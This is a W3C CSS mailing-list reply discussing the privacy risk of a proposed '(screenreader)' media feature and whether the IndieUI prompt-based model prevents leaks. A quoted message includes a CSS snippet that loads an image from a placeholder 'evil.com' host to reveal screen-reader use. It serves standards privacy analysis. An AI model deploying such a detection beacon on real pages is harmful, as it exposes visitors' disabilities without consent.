- From: James Craig <jcraig@apple.com>
- Date: Tue, 2 Dec 2014 13:58:47 -0800
- To: Florian Rivoal <florian@rivoal.net>
- Cc: fantasai <fantasai.lists@inkedblade.net>, Alan Stearns <stearns@adobe.com>, www-style list <www-style@w3.org>, "Tab Atkins Jr." <jackalmage@gmail.com>, fantasai <fantasai@inkedblade.net>
> On Dec 2, 2014, at 1:46 PM, Florian Rivoal <florian@rivoal.net> wrote:
>
>> It'd be problematic to offer an unprotected "(screenreader)" media feature because it would offer any web page the ability to detect with a high degree of certainty that a visitor has a particular physical disability. In my opinion, it would be a privacy an personal security nightmare to implement *unless* CSS were to implement a media feature privacy model similar to the one defined in IndieUI User Context.
>
> I agree that a privacy protecting model is worth having for something like this. However, unless I am missing something, the privacy model you propose doesn’t provide adequate protection. What prevents authors form doing this:
>
> <style>
> @media (screenreader) { #snoop { background: url(http://www.evil.com/info-leak.gif); } }
> </style>
> <div id=“snoop”></div>
That wouldn't ever load the image until after the user had approved access. It would also not be subject to a timing attack because the prompt would not block.
From the spec:
To avoid privacy concerns, User Agents MUST immediately return the default value for any restricted features that will result in a user prompt. If and when the user chooses to share settings from the relevant category with the requesting page, the web page author can handle a user setting change callback, or make a subsequent request to the userSetting() method of the Window object.
http://rawgit.com/w3c/indie-ui/master/src/indie-ui-context.html#RequirementsForUserSetting
Received on Tuesday, 2 December 2014 21:59:16 UTC